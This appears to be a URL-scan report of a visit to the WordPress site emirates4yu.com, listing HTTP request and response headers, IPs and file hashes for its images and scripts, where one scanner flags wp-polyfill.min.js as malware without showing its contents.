IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 8473bf0d64cf01b0d73de1e3a56cb2e1
d9a6e27c51516f8ab2ddfff90b4bda469c808c20
7b4634dc12114ad41ccbde357c30d4d41f1ca16757bd5e45866a8514fc9492fd
GET /wp-content/uploads/2017/11/bottom-12.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8560
last-modified: Tue, 21 Nov 2017 10:36:46 GMT
etag: "5a1401be-2170"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-13.jpg
35.190.203.220 200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-13.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 8c291cbe6490881cc3c0755cf9a2539a
599192c130410d6459b6fa8817d97becc1eb5126
c7e33b9b92373aeb53a9a99f94577e67449d8fe06d308143546c0d1ccf1a2adb
GET /wp-content/uploads/2017/11/bottom-13.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11013
last-modified: Tue, 21 Nov 2017 10:36:49 GMT
etag: "5a1401c1-2b05"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-14.jpg
35.190.203.220 200 OK 8.4 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-14.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 1b512c63aefd76046daf3b4c085e309e
ef2f61ac159a93c756051fc086517b0fcee5250d
42f98a554f182b02bd320a323567a3c0836d47986a021e270974e5cc86e847be
GET /wp-content/uploads/2017/11/bottom-14.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8434
last-modified: Tue, 21 Nov 2017 10:36:51 GMT
etag: "5a1401c3-20f2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-1.jpg
35.190.203.220 200 OK 5.9 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-1.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash dc651fa5f898b866c5e85c14ad47c662
25e051e8d4f74fd64d462558720aeee32069a7b1
05143b2664e98a00ab6c055a93a450aed1775a0f7c0603d2d426737adb98e03b
GET /wp-content/uploads/2017/11/top-logo-1.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 5866
last-modified: Tue, 21 Nov 2017 10:36:52 GMT
etag: "5a1401c4-16ea"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-2.jpg
35.190.203.220 200 OK 6.0 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-2.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash a087413233d0ad374ca46a033ad59c5a
2ac1d2ab1738b843908b59dc532266e66847541e
02a0d1c77182ce4e212d4b492781e87dc2f809201b4ba899fcbd3e5b15c7d933
GET /wp-content/uploads/2017/11/top-logo-2.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 5959
last-modified: Tue, 21 Nov 2017 10:36:54 GMT
etag: "5a1401c6-1747"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-2.jpg
35.190.203.220 200 OK 9.1 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-2.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash de08c6e5310907878d711da01c1eab43
e9f9a74aed8de5bd183e2d5e243a741700a0c49e
a583c34d1fbdb883bcb7365a10ba2df937b0cf2440dfc0b3776d0e25361d3865
GET /wp-content/uploads/2017/11/bottom-2.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9055
last-modified: Tue, 21 Nov 2017 10:36:23 GMT
etag: "5a1401a7-235f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-3.jpg
35.190.203.220 200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-3.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 78efe6e21e35242ebb9407aed929cfa6
5ad8960ed5419d62bc0e536b8cbab2f8881dd83e
9999107093e99f633df47ff32121411af7d0ed6f03bccd638eabb321bafa1d50
GET /wp-content/uploads/2017/11/bottom-3.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14019
last-modified: Tue, 21 Nov 2017 10:36:25 GMT
etag: "5a1401a9-36c3"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-5.jpg
35.190.203.220 200 OK 21 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-5.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 9a7666b01a98a94da991e5a9fd110f88
0e5bc46fe206dc7fc9f32c980733e90fe9042bec
29560a242bc1195e7efc8b39b42a7ecdec3dc2ab04764f8c9ae398420f22afb1
GET /wp-content/uploads/2017/11/bottom-5.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 20676
last-modified: Tue, 21 Nov 2017 10:36:30 GMT
etag: "5a1401ae-50c4"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-11.jpg
35.190.203.220 200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-11.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 392bd7dc45b2bc71686745067df3d386
d8188d8d77bd6ad7bfbb8417e1cddedd5954edc4
27413c02c7178c86dc51788315b64261c38737e92286969d4eccf5148c0ff34f
GET /wp-content/uploads/2017/11/bottom-11.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11424
last-modified: Tue, 21 Nov 2017 10:36:45 GMT
etag: "5a1401bd-2ca0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-10.jpg
35.190.203.220 200 OK 9.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-10.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 82b4f6ac1cd8502f3b319a9b27198bac
d1f35f28eea0114b99352965cd3a9fb039d6c417
3f091eeab05a05d4dd0a0d3b9328f15b54dfcb5f38427a54a13848e7246d8a49
GET /wp-content/uploads/2017/11/bottom-10.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9613
last-modified: Tue, 21 Nov 2017 10:36:42 GMT
etag: "5a1401ba-258d"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-9.jpg
35.190.203.220 200 OK 21 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-9.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash f0bd97c3d1c1b134d05d8cc259f91e51
d9efa847b70fda7ab72afb09b57cb214e1abfbba
00765cf99f6fdbb68fb814f50854a01c3e861764d70e1e10199dac15aae31b01
GET /wp-content/uploads/2017/11/bottom-9.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 20902
last-modified: Tue, 21 Nov 2017 10:36:40 GMT
etag: "5a1401b8-51a6"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-8.jpg
35.190.203.220 200 OK 8.2 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-8.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash fcca53149109219df56e2b7feb95572e
46004fa462ddc3717e1ddfce362c14feb3bdee28
e8b14877872b155635ef1c38e76a3294ca4e3dbe43a7aa84d823ddafa7c1f7c7
GET /wp-content/uploads/2017/11/bottom-8.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8204
last-modified: Tue, 21 Nov 2017 10:36:38 GMT
etag: "5a1401b6-200c"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-7.jpg
35.190.203.220 200 OK 17 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-7.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 83a4ba694e87c3ba155a489035e4957e
e7e2819ba6f1b0a3914e9cd338252ae1a153d079
b53d7f0b37e9f472650aac139b1f043671d8b0b55a576a8d3c3bf9619a2ac2cc
GET /wp-content/uploads/2017/11/bottom-7.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 16646
last-modified: Tue, 21 Nov 2017 10:36:35 GMT
etag: "5a1401b3-4106"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-6.jpg
35.190.203.220 200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-6.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 4eab79dda963361bb3e424ad4f9df5f8
e9bf4524ea9b30139cbb90cdb573c1459f0e2266
3f72d982f5a589f5306b16bf9ce0354622829a0f9bd1dc21065a0def99219a00
GET /wp-content/uploads/2017/11/bottom-6.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14538
last-modified: Tue, 21 Nov 2017 10:36:33 GMT
etag: "5a1401b1-38ca"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-4.jpg
35.190.203.220 200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-4.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 5d8587e375b6360a6be61374f6c2d530
96dba5e48405edf91a297c0923dda3afd8fb2caa
abc13b34dcf0553f88007a2d7a6a8adda9671a399276fb3d8e6949c01c52e363
GET /wp-content/uploads/2017/11/bottom-4.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14481
last-modified: Tue, 21 Nov 2017 10:36:28 GMT
etag: "5a1401ac-3891"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-1.jpg
35.190.203.220 200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-1.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3
Hash 927ad9308a7d419df51418148ef4bb89
2a3fabc325a0c63c7035bd97fc9a8e067c0be820
fc394ce0a46039d708c5e115e0cbe16a38fc8bdf0fb6aad5a9cf2fd4301817b6
GET /wp-content/uploads/2017/11/bottom-1.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11002
last-modified: Tue, 21 Nov 2017 10:36:21 GMT
etag: "5a1401a5-2afa"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
www.google.com/recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0
142.250.74.164 200 OK 582 B URL HTTP/2 www.google.com/recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0
IP 142.250.74.164:0
File type ASCII text, with very long lines (884), with no line terminators
Hash 3eec2b12b9c8525fb2279fe84a006cfc
10f9f17053dc87a6eff4921a44464822c40ec338
40bbc61668f6c5132ce35b47d149c21289ace6094095c225e7a742a773d29c53
GET /recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
expires: Fri, 25 Nov 2022 12:02:00 GMT
date: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=300
content-type: text/javascript; charset=UTF-8
cross-origin-resource-policy: cross-origin
content-encoding: gzip
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
content-length: 582
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash b44543de9922ec7d97f2e0be1865553e
caef856450efd75de0cfae9402903b1f4bd6de4c
d251377b4bc11c32a847ce4dc5dfda92e56031617f5b3eeea54fdcd0945b3eb7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash df06e70fc8a35facf1d8db463d18e231
fa8a2975566cc792898f870e48ae7518d3657326
4cef7e704f4d575ce6733f6f2d803d241b597be51ff3fb03f72e5c33a893b504
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 2594
Cache-Control: max-age=164885
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Etag: "638085ab-1d7"
Expires: Sun, 27 Nov 2022 09:50:05 GMT
Last-Modified: Fri, 25 Nov 2022 09:06:51 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 471
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 65992aeb8efb9a0b8fd59687090733fe
526a2afccc93d32849185d153fafe44b72797df9
b6677984b6c3602d7b62df776158c09a3e57eec4c0edbddafb0624200715f10e
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140 200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data, ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Cache-Control, ETag, Pragma, Expires, Backoff, Last-Modified
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 25 Nov 2022 11:08:53 GMT
cache-control: public,max-age=3600
age: 3187
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash a0111a2443450172e5d2b48d350a8f57
75e89d4cd001303e66a93880f96d6c47e7d665ab
c9865c82b8f373aeb3a7333b0f65408211d832aba753c35d3544ecb2913f4f64
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
35.190.203.220 200 OK 7.7 kB URL HTTP/2 emirates4yu.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
IP 35.190.203.220:0
File type Unicode text, UTF-8 text, with very long lines (19138), with no line terminators
Hash fb897ad0e80dcb3d52d0c0674c3012b5
bc1c220d1d32b338e22ae10528becd0579049f58
0c3475b70c1b5a2aa3dd645fd32d7ba69d5d1e2f8c8e1cbe707fc8513902578f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 11 Apr 2022 12:04:30 GMT
etag: W/"6254194e-4ac6"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
